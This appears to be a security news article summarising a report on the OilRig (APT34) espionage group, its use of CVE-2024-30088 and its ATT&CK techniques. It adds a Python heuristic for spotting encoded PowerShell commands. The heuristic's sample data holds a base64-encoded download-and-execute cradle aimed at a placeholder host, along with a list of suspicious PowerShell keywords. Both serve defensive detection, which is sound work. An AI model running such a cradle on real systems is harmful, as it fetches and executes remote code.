CVE-2024-30088 Under Attack: OilRig Targets Windows Kernel Vulnerability
Renowned for cyber espionage activities targeting critical sectors in the Middle East, OilRig, also known as APT34 or Helix Kitten, operates with precision, exploiting vulnerabilities and employing advanced techniques to achieve its geopolitical objectives.
In its latest report, Picus Labs delves deep into the operations of this Iranian state-sponsored actor. The report highlights OilRig’s evolution, its historical campaigns, and the advanced tactics it uses.
OilRig emerged in the cyber threat landscape in 2016, with some evidence suggesting earlier activities. Initially targeting Saudi Arabian organizations through spearphishing campaigns and the deployment of the Helminth backdoor, the group quickly demonstrated a capacity for long-term persistence and stealth. “OilRig has risen to prominence with its strategic use of the Helminth backdoor, an advanced malware tool that enabled stealthy, sustained access to targeted systems,” the report notes.
Over the years, OilRig has expanded its reach across the Middle East, targeting government entities, energy sectors, and technology providers. Its tools have evolved, from the early Helminth malware to more sophisticated payloads like QUADAGENT and ISMAgent. These backdoors, coupled with open-source obfuscation tools like Invoke-Obfuscation, reflect the group’s adaptability and technical expertise.
The report outlines how OilRig incorporates zero-day and recently disclosed vulnerabilities into its arsenal, including the exploitation of CVE-2024-30088. This Windows Kernel vulnerability allowed OilRig to gain SYSTEM-level access, enabling it to deploy its custom STEALHOOK backdoor for prolonged monitoring and data exfiltration.
OilRig has also targeted supply chains, using compromised accounts within technology providers to launch broader attacks. The 2018 QUADAGENT campaign exemplified this strategy, leveraging PowerShell-based malware to infiltrate government and corporate networks, often undetected.
Picus Labs provides a detailed overview of OilRig’s tactics, techniques, and procedures (TTPs) through the MITRE ATT&CK framework. Among the highlights:
- Initial Access: OilRig excels in spearphishing campaigns, often masquerading as trusted contacts on platforms like LinkedIn to harvest credentials.
- Execution: The group relies on PowerShell and other scripting tools for stealthy command execution within compromised environments.
- Persistence: Scheduled tasks and obfuscated payloads ensure continuous access, even after partial remediation efforts.
- Defense Evasion: Advanced obfuscation techniques, including base64 encoding and Invoke-Obfuscation, allow OilRig to bypass detection systems.
- Credential Access: Tools like Mimikatz and LaZagne enable the extraction of plaintext credentials from password stores and memory dumps.
- Exfiltration: OilRig employs alternative protocols, such as FTP and DNS tunneling, to extract sensitive data while evading monitoring systems.
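The Execution and Defense Evasion entries above describe PowerShell driven by base64-encoded command lines. The following detection heuristic is an added example, not code from the Picus Labs report or from OilRig tooling: it scans process-creation command lines, recognises the abbreviated forms of `-EncodedCommand` that PowerShell accepts, decodes the UTF-16LE payload and scores the result. The sample command lines and the payload string are constructed for the example.

```python
import base64
import re

# Constructed sample command lines (not from the report). The encoded
# payload is built at import time so the example stays self-contained.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -W Hidden -enc {_ENCODED}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    f"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e {_ENCODED}",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so match any "-e..." switch followed by a base64 blob and check the prefix in code.
_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "webclient",
              "frombase64string")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = _FLAG_RE.search(cmdline)
    if not m or not "encodedcommand".startswith(m.group(1).lower()):
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Score one command line; a score of 2 or more merits analyst attention."""
    decoded = decode_encoded_command(cmdline)
    score, reasons = 0, []
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
        hits = [s for s in SUSPICIOUS if s in decoded.lower()]
        if hits:
            score += 1
            reasons.append("decoded payload contains " + ", ".join(hits))
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline.lower()):
        score += 1
        reasons.append("hidden window")
    return {"score": score, "reasons": reasons, "decoded": decoded}


def scan(cmdlines) -> list:
    """Return (cmdline, result) pairs for every command line scoring 2 or more."""
    return [(c, r) for c in cmdlines if (r := analyze_cmdline(c))["score"] >= 2]
```

Feed it Sysmon Event ID 1 or Windows 4688 command lines; a decoded payload is worth logging alongside the alert so analysts do not have to decode it by hand.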
The Picus Labs report provides a comprehensive overview of OilRig’s TTPs, mapping them to the MITRE ATT&CK framework. This detailed analysis offers valuable insights for organizations seeking to defend against this persistent threat.